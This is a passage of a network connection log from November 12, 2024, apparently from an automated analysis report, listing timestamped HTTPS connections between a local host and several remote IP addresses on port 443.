                                                        Nov 12, 2024 16:27:06.522842884 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.523417950 CET49776443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.523422956 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.524087906 CET49777443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.524106026 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.524782896 CET49777443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.524787903 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.533159018 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.536345959 CET49780443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.536370039 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.536788940 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.539689064 CET49780443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.539694071 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.539928913 CET49779443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.539938927 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.541827917 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.545041084 CET49779443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.545047045 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.546262980 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.546278954 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.546719074 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.547426939 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.547508001 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.547970057 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.548973083 CET49782443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.548979998 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.549067020 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.549257040 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.555196047 CET49782443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.555249929 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.555438042 CET49782443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.591335058 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.592238903 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.592313051 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.592606068 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.592658997 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.593099117 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.593151093 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.594131947 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.594182014 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.594573021 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.594633102 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.603336096 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.651808977 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.652286053 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.652740955 CET49777443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.652997971 CET49777443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.653013945 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.653049946 CET49777443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.653055906 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.653251886 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.653770924 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.653817892 CET49776443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.655536890 CET49776443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.655545950 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.655627012 CET49776443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.655632019 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.658323050 CET49785443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.658364058 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.658397913 CET49786443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.658416033 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.658441067 CET49785443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.658466101 CET49786443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.658598900 CET49785443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.658611059 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.658673048 CET49786443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.658685923 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.668915987 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.668968916 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.669117928 CET49780443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.669287920 CET49780443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.669298887 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.669308901 CET49780443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.669312954 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.670754910 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.670918941 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.670969009 CET49779443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.671051025 CET49779443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.671060085 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.671067953 CET49779443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.671072006 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.673551083 CET49787443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.673578024 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.673779011 CET49787443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.673995972 CET49787443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.674006939 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.675401926 CET49788443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.675426006 CET4434978813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.675519943 CET49788443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.675714016 CET49788443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.675726891 CET4434978813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.677084923 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.677100897 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.677140951 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.677160978 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.677172899 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.677212954 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.678112030 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.678121090 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.681231022 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.682996035 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.683093071 CET49782443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.683363914 CET49782443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.683368921 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.710803032 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.710863113 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.711319923 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.711368084 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.711769104 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.711827993 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.712665081 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.712718010 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.828665972 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.828737974 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.828916073 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.828965902 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.828974009 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.829010963 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.829426050 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.829436064 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.896058083 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.903171062 CET49778443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.903178930 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.904253006 CET49778443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:06.904257059 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.030163050 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.030216932 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.030282974 CET49778443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.031008959 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.035839081 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.035849094 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.036937952 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.037000895 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.039930105 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.040002108 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.040128946 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.064584970 CET49778443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.064594984 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.064604044 CET49778443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.064609051 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.083328962 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.086999893 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.087004900 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.088423014 CET49790443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.088438034 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.088506937 CET49790443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.114469051 CET49790443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.114481926 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.133799076 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.268707991 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.268749952 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.268815994 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.268826008 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.268927097 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.269001961 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.273453951 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:07.273463964 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:07.394846916 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.395874023 CET49786443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.395885944 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.397059917 CET49786443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.397063971 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.401384115 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.402482033 CET49785443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.402501106 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.403352976 CET49785443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.403357983 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.403703928 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.404577971 CET49787443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.404593945 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.405647993 CET49787443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.405653000 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.406328917 CET4434978813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.406960964 CET49788443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.406971931 CET4434978813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.407718897 CET49788443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.407722950 CET4434978813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.533565998 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.533621073 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.533704042 CET49787443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.535115004 CET49787443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.535131931 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.535142899 CET49787443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.535149097 CET4434978713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.536484957 CET4434978813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.536585093 CET4434978813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.536629915 CET49788443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.537406921 CET49788443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.537416935 CET4434978813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.543371916 CET49792443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.543406963 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.543539047 CET49792443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.543700933 CET49793443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.543725014 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.543783903 CET49793443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.544303894 CET49792443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.544322968 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.544455051 CET49793443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.544466972 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.561454058 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.561683893 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.561733007 CET49786443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.562513113 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.562861919 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.562908888 CET49785443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.563196898 CET49786443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.563205004 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.563216925 CET49786443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.563220978 CET4434978613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.563334942 CET49785443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.563344002 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.563370943 CET49785443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.563375950 CET4434978513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.569348097 CET49794443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.569358110 CET4434979413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.569427013 CET49794443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.569758892 CET49794443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.569772005 CET4434979413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.575603008 CET49795443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.575624943 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.575835943 CET49795443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.576337099 CET49795443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.576344967 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.890299082 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.894936085 CET49790443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.894954920 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:07.896939039 CET49790443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:07.896944046 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.032505989 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.032860994 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.032933950 CET49790443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.032963037 CET49790443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.032974958 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.032985926 CET49790443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.032995939 CET4434979013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.035420895 CET49797443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.035471916 CET4434979713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.035550117 CET49797443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.035720110 CET49797443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.035741091 CET4434979713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.264564991 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.265872002 CET49793443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.265892029 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.266415119 CET49793443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.266421080 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.278479099 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.279211044 CET49792443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.279237986 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.280003071 CET49792443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.280009985 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.313570976 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.313571930 CET4434979413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.314313889 CET49795443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.314328909 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.314562082 CET49794443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.314578056 CET4434979413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.315026045 CET49794443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.315031052 CET4434979413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.315119028 CET49795443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.315124035 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.394077063 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.394140959 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.394337893 CET49793443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.394737005 CET49793443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.394751072 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.394762993 CET49793443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.394768953 CET4434979313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.405180931 CET49798443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.405205965 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.405271053 CET49798443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.406723976 CET49798443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.406738043 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.409444094 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.411212921 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.411267042 CET49792443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.411334991 CET49792443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.411345959 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.411355019 CET49792443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.411359072 CET4434979213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.414102077 CET49799443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.414129972 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.414215088 CET49799443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.414361954 CET49799443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.414376020 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.444324970 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.444771051 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.444813967 CET49795443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.451050997 CET4434979413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.452308893 CET4434979413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.452362061 CET49794443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.468324900 CET49795443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.468355894 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.468370914 CET49795443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.468375921 CET4434979513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.491244078 CET49794443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:08.491250038 CET4434979413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.754585028 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:08.754632950 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:08.754751921 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:27:08.773530006 CET4434979713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:08.821316957 CET49797443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.094419003 CET49800443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.094455004 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.094608068 CET49800443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.107141018 CET49797443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.107161999 CET4434979713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.107846975 CET49797443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.107851982 CET4434979713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.126779079 CET49801443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.126822948 CET4434980113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.126877069 CET49801443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.127032042 CET49801443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.127044916 CET4434980113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.131685019 CET49800443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.131701946 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.179497957 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.233191967 CET49798443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.233208895 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.235142946 CET49798443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.235147953 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.236093044 CET4434979713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.236146927 CET4434979713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.236249924 CET49797443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.241667032 CET49797443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.241681099 CET4434979713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.348323107 CET49802443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.348349094 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.348407030 CET49802443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.351769924 CET49802443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.351783037 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.367630959 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.367677927 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.367888927 CET49798443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.386326075 CET49798443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.386337996 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.386441946 CET49798443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.386449099 CET4434979813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.505511999 CET49803443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.505553961 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.505631924 CET49803443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.527036905 CET49803443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.527057886 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.883728981 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.895401955 CET4434980113.107.246.45192.168.2.6
